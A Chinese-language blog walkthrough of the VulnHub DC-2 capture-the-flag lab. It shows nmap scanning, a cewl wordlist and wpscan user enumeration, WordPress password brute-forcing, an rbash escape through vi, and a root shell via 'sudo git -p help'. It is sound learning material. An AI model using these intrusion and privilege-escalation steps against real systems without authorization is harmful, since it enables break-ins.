前言·

官网及下载:DC: 2 ~ VulnHub

视频教程:DC系列靶机DC2通关讲解_哔哩哔哩_bilibili

博客:

Vulnhub靶机 DC-2 打靶 渗透详细过程 - FreeBuf网络安全行业门户

[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)_vnlubun靶场-CSDN博客

任务:找到隐藏的5个flag

关于vulnhub靶场:镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替 一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。

信息收集·

1
2
3
4
5
6
7
8
9
10
11
nmap -sP 192.168.239.0/24
Host is up (0.0015s latency).
Nmap scan report for bogon (192.168.239.135)



sudo nmap -p 1-65535 192.168.239.135
也可以用-p-全部端口扫描
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu

嗯… 无法访问此页面

检查 dc-2 中是否存在拼写错误。

不过有时也能访问,不过会出现css不加载很丑的页面

sudo vim /etc/hosts 加入 IP 空格 dc-2 域名解析

WIN:C:\Windows\System32\drivers\etc\hosts文件修改

自己琢磨挺久,视频和官方文档有讲

Please note that you will need to set the hosts file on your pentesting device to something like:

主页中有flag页面,点击查看第一个flag

image-20240628171942576

1
2
3
4
5
6
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

爆破密码·

关键词:cewl 爬网站获取字典

tree / -L 2 -w dc2查看根目录,深度两层,tree的形式

└─$ cewl http://dc-2 -w dc2.txt CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

└─$ cat dc2.txt|wc -l 238

进入登录页面开始爆破:http://192.168.239.135/wp-login.php

直接admin 所有密码都不对,尝试wpscan扫描用户名:wpscan --url http://192.168.239.135/ --enumerate u

Scan Aborted: The URL supplied redirects to http://dc-2/. Use the --ignore-main-redirect option to ignore the redirection and scan the target, or change the --url option value to the redirected URL.

获取到的用户列表如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

发现爆破结果length有几个length差1,送入compare分析

image-20240628174803315

通过length排序或 状态码排序

账号密码:

tom parturient

jerry adipiscing

image-20240628175312568

jerry的权限更高,可以查看修改Page页面

Flag 2:

If you can’t exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

不要搞WP的漏洞了,尝试其他方式

当时另一个端口开放,nmap 192.168.239.135 -p 7744 --script=bannerbanner也比较快 -A全扫描 深度

PORT STATE SERVICE 7744/tcp open raqmon-pdu |_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ ssh jerry@192.168.239.135 -p 7744
The authenticity of host '[192.168.239.135]:7744 ([192.168.239.135]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[192.168.239.135]:7744' (ED25519) to the list of known hosts.
jerry@192.168.239.135's password: 
Permission denied, please try again.

jerry作为高权限但是无法ssh登录

提权·

竟然没有cat命令 rbash:受限制的bash echo $SHELL

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

tom@DC-2:~$ cd usr -rbash: cd: restricted

vi rbash绕过

:set shell=/bin/bash 回车

:shell

echo $PATH

export PATH=‘/usr/bin:/bin’

进入home/jerry目录下,看到flag4.txt

1
2
3
4
5
6
7
ood to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

git提权

sudo git -p help

!/bin/bash

进入root目录下查看flag

tom is not in the sudoers file. This incident will be reported.

1
2
3
4
5
6
7
8
9
10
11
jerry@DC-2:/home$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jerry: 
Sorry, user jerry is not allowed to execute '/bin/su' as root on DC-2.

root@DC-2:/home# cd /root

well done!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

结束了,一步步的,适合小白,很多提权之前根本不知道,还是要多搜多想多学多复盘

不到两小时,打靶机还挺爽的